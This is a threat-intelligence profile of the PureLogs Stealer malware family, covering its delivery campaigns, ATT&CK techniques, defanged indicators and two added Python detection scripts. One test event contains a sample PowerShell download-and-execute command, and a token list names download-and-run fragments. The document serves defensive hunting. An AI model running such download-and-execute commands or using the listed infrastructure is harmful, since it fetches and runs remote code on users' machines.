PureLogs Stealer

PureLogs Stealer is an information-stealing malware family that harvests saved data from browsers, cryptocurrency wallets, messaging clients, and other applications; public reporting describes it as a credential harvester and information stealer. It has been observed in broader cybercrime operations alongside PureRAT, PureHVNC, ResolverRAT, and likely Lumma/ZgRAT, including campaigns analyzed by Breakglass Intelligence that were active since at least November 2025. In that activity, delivery relied on ClearFake/ClickFix fake browser update lures and a Donut in-memory loader that executed an obfuscated .NET payload. The surrounding malware ecosystem used encrypted HTTPS communications, RSA- and AES-protected channels, certificate pinning, and multiple fallback ports.

Huntress reported a February 2026 fake OpenClaw installer campaign in which a Rust-based loader, svc_service.exe, was suspected of running PureLogs Stealer in memory. That campaign used malicious GitHub repositories surfaced through Bing AI search results and broadly targeted users searching for OpenClaw installers on Windows and macOS. Separately, Cofense observed phishing that used lures themed around the U.S. Social Security Administration and copyright infringement to distribute information stealers including PureLogs Stealer.

PureLogs Stealer is also named among the malware developed by PureCoder, and it was reported in attacks recorded between August and November 2025 alongside Pay2Key ransomware and other PureCoder tooling such as PureCrypter and PureHVNC.

Most high-confidence infrastructure and technical detail in the cited reporting describes the broader campaign ecosystem rather than PureLogs-specific internals. Reported related indicators include the domains dndhub[.]xyz and kampf[.]huehnchenfarm[.]ru, the IP address 45[.]141[.]119[.]34, and the suspected loader artifact svc_service.exe (indicators are shown defanged).
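The indicators above are published defanged, so the first practical step is to refang them and sweep telemetry for exact hits. The following is an added example, not Mallory's or any vendor's code: it refangs the page's four indicators, compiles anchored matchers (a domain hit also covers its subdomains, but the bare parent of kampf[.]huehnchenfarm[.]ru is not treated as a hit, and a near-miss IP such as 45.141.119.3 is ignored), and runs them over a few constructed log lines. The log lines are made up for the demo and do not come from any incident.

```python
"""IOC sweep for the PureLogs Stealer indicators named on this page.

Added example, not Mallory's or any vendor's code. The indicators are the
ones the page lists; the log lines are constructed for the demo.
"""
import re
from typing import Iterable

# Indicators exactly as the page lists them (defanged).
DEFANGED_IOCS = {
    "domain": ["dndhub[.]xyz", "kampf[.]huehnchenfarm[.]ru"],
    "ipv4": ["45[.]141[.]119[.]34"],
    "filename": ["svc_service.exe"],
}


def refang(value: str) -> str:
    """Turn a defanged indicator back into its matchable form.

    Handles the common [.] / (.) / {.} and hxxp conventions; anything
    else is returned lower-cased and otherwise untouched.
    """
    value = value.strip().lower()
    value = re.sub(r"\[\.\]|\(\.\)|\{\.\}", ".", value)
    value = re.sub(r"^hxxp(s?)://", r"http\1://", value)
    return value


def build_matchers(iocs=DEFANGED_IOCS):
    """Compile one anchored regex per indicator.

    Domains match themselves or any subdomain (cdn.dndhub.xyz) but not a
    longer label (notdndhub.xyz); IPs must not be a prefix of a longer IP;
    filenames may follow a path separator.
    """
    matchers = []
    for kind, values in iocs.items():
        for raw in values:
            clean = refang(raw)
            if kind == "domain":
                pat = r"(?<![\w.-])(?:[\w-]+\.)*" + re.escape(clean) + r"(?![\w-])"
            elif kind == "ipv4":
                pat = r"(?<![\d.])" + re.escape(clean) + r"(?![\d.])"
            else:  # filename
                pat = r"(?<![\w.-])" + re.escape(clean) + r"(?![\w-])"
            matchers.append((kind, clean, re.compile(pat, re.IGNORECASE)))
    return matchers


def sweep(lines: Iterable[str], matchers=None):
    """Return (line_number, kind, indicator) for every indicator hit."""
    matchers = matchers or build_matchers()
    hits = []
    for n, line in enumerate(lines, start=1):
        for kind, ioc, rx in matchers:
            if rx.search(line):
                hits.append((n, kind, ioc))
    return hits


# Constructed sample telemetry (DNS, proxy, process creation); not real data.
SAMPLE_LOGS = [
    "2026-02-10T09:12:01Z dns client=10.0.4.21 query=cdn.dndhub.xyz type=A",
    "2026-02-10T09:12:02Z proxy src=10.0.4.21 dst=45.141.119.34:443 action=allow",
    "2026-02-10T09:12:05Z proc host=WS-021 parent=explorer.exe image=C:\\Users\\jdoe\\Downloads\\svc_service.exe",
    "2026-02-10T09:13:40Z dns client=10.0.4.22 query=huehnchenfarm.ru type=A",
    "2026-02-10T09:14:00Z proxy src=10.0.4.23 dst=45.141.119.3:443 action=allow",
]

if __name__ == "__main__":
    for hit in sweep(SAMPLE_LOGS):
        print(hit)
```

Running the block reports three hits (the dndhub[.]xyz subdomain query, the connection to 45.141.119.34, and the svc_service.exe launch) and correctly ignores the parent domain huehnchenfarm.ru and the unrelated IP 45.141.119.3. The filename match is weak evidence on its own; treat it as a pivot to the hash set rather than a verdict.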

MITRE ATT&CK

Techniques & procedures

12 distinct techniques documented for this family, organized by ATT&CK tactic (T1053.005 is listed under Execution, Persistence, and Privilege Escalation).

Resource Development (1 technique)

T1608.006 SEO Poisoning (evidence: 1)

A malicious GitHub repository was promoted via Bing AI search results for OpenClaw Windows ... just hosting the malware on GitHub was enough to poison Bing AI search results.

Initial Access (1 technique)

T1566.002 Spearphishing Link (evidence: 1)

"These include spear phishing attacks..."; "...Booking[.]com-spoofing emails with embedded links to a ClickFix fake CAPTCHA site..."

Execution (3 techniques)

T1053.005 Scheduled Task (evidence: 1)

Stealth Packer is a new packer that... creates hidden ghost scheduled tasks... EdgeUpdateHelper Scheduled Task ... Set to run ... AdobeCloudHelper.exe daily

T1059.001 PowerShell (evidence: 1)

"...guided to run a PowerShell command on Windows by opening the Windows Run dialog..."

T1204 User Execution (evidence: 2)

The malicious GitHub repository contained installation instructions which, if followed, would run information stealers and GhostSocks malware on a Windows system, and Atomic MacOS Stealer (AMOS) on a MacOS system.

Persistence (1 technique)

T1053.005 Scheduled Task (evidence: 1)

Stealth Packer is a new packer that... creates hidden ghost scheduled tasks... EdgeUpdateHelper Scheduled Task ... Set to run ... AdobeCloudHelper.exe daily

Privilege Escalation (1 technique)

T1053.005 Scheduled Task (evidence: 1)

Stealth Packer is a new packer that... creates hidden ghost scheduled tasks... EdgeUpdateHelper Scheduled Task ... Set to run ... AdobeCloudHelper.exe daily

Defense Evasion (2 techniques)

T1036 Masquerading (evidence: 2)

This blog details an investigation into malicious GitHub repositories posing as OpenClaw installers... At first glance, the GitHub repository could easily be mistaken for a legitimate installer.

T1620 Reflective Code Loading (evidence: 1)

Stealth Packer is a new packer that injects malware into memory... The vast majority of executables were loaders created in Rust designed to run information stealers in memory.

Credential Access (2 techniques)

T1555 Credentials from Password Stores (evidence: 1)

information stealers continue to be an initial access vector... If an information stealer compromises the system, it can harvest not only account credentials but also sensitive OpenClaw configuration files

T1555.003 Credentials from Web Browsers (evidence: 1)

PureLogs Stealer browser credential theft

Command and Control (2 techniques)

T1008 Fallback Channels (evidence: 1)

22 C2 IPs, 8 domains, 10+ port options

T1071.001 Web Protocols (evidence: 1)

HTTPS C2 with certificate pinning

Exfiltration (1 technique)

T1041 Exfiltration Over C2 Channel (evidence: 1)

Data exfiltration over encrypted C2
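Two of the techniques above are hunt-friendly behaviours rather than atomic indicators: the ClickFix step where a user is guided to paste a PowerShell command into the Run dialog (T1059.001), and the ghost scheduled task named like a vendor updater (EdgeUpdateHelper) that runs a binary such as AdobeCloudHelper.exe daily (T1053.005). The following is an added example, not Mallory's or any vendor's code. It runs two checks over constructed Sysmon-style events: explorer.exe (the Run dialog's parent) launching PowerShell with a download-and-execute command line, and a task whose action binary lives in a user-writable directory. The event field names, the PowerShell token list, and the path list are assumptions for the demo and are not taken from the page.

```python
"""Behavioural hunts for ClickFix paste-and-run and ghost scheduled tasks.

Added example, not Mallory's or any vendor's code. Field names, the token
list and the path list are assumptions; the events are constructed.
"""
import re

# PowerShell fragments common in paste-and-run lures (assumed starting list).
PS_LURE_TOKENS = (
    "iex", "invoke-expression", "-enc", "-encodedcommand", "downloadstring",
    "invoke-webrequest", "irm ", "-w hidden", "-windowstyle hidden",
)

# Directories a legitimate vendor updater is not expected to run from (assumed).
USER_WRITABLE = re.compile(
    r"\\(users\\[^\\]+\\(appdata|downloads|desktop)|programdata|temp)\\",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Last path component, lower-cased, for Windows-style paths."""
    return path.rsplit("\\", 1)[-1].lower()


def is_clickfix(ev: dict) -> bool:
    """explorer.exe -> powershell.exe/pwsh.exe with a lure-style command line.

    The Run dialog is hosted by explorer.exe, so a paste-and-run lure shows up
    as explorer spawning PowerShell directly; scripts launched from cmd.exe or
    a terminal are deliberately out of scope for this rule.
    """
    if ev.get("type") != "process":
        return False
    if basename(ev["parent"]) != "explorer.exe":
        return False
    if basename(ev["image"]) not in ("powershell.exe", "pwsh.exe"):
        return False
    cmd = ev.get("cmdline", "").lower()
    return any(tok in cmd for tok in PS_LURE_TOKENS)


def is_ghost_task(ev: dict) -> bool:
    """Scheduled task whose action binary lives in a user-writable directory."""
    if ev.get("type") != "task_created":
        return False
    return bool(USER_WRITABLE.search(ev["action"]))


def hunt(events):
    """Return (rule, event id) for every event that trips a rule."""
    hits = []
    for ev in events:
        if is_clickfix(ev):
            hits.append(("clickfix_run_dialog", ev["id"]))
        if is_ghost_task(ev):
            hits.append(("task_from_user_path", ev["id"]))
    return hits


# Constructed sample events (not from a real incident).
SAMPLE_EVENTS = [
    {"id": 1, "type": "process",
     "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iex (irm http://example.invalid/a)"'},
    {"id": 2, "type": "process",
     "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell -NoProfile -Command Get-Date"},
    {"id": 3, "type": "process",
     "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell -c iex (gc script.ps1)"},
    {"id": 4, "type": "task_created",
     "task_name": "\\EdgeUpdateHelper",
     "action": "C:\\Users\\jdoe\\AppData\\Roaming\\AdobeCloudHelper.exe",
     "trigger": "daily", "hidden": True},
    {"id": 5, "type": "task_created",
     "task_name": "\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdateTaskMachineCore",
     "action": "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe",
     "trigger": "daily", "hidden": False},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

Only events 1 and 4 trip a rule: the benign explorer-launched PowerShell (event 2) carries none of the lure tokens, the cmd.exe-launched script (event 3) is outside the Run-dialog rule by design, and the genuine Edge updater task (event 5) runs from Program Files. The task rule keys on where the action runs from rather than on the task name, since the whole point of the EdgeUpdateHelper naming is that it looks legitimate.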

INDICATORS OF COMPROMISE

IOCs tracked for this family

46 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

Network: 30 tracked. IPs, domains, and DNS infrastructure linked to this family.

Hashes: 16 tracked. File hashes (MD5, SHA-1, SHA-256) from samples and reports.
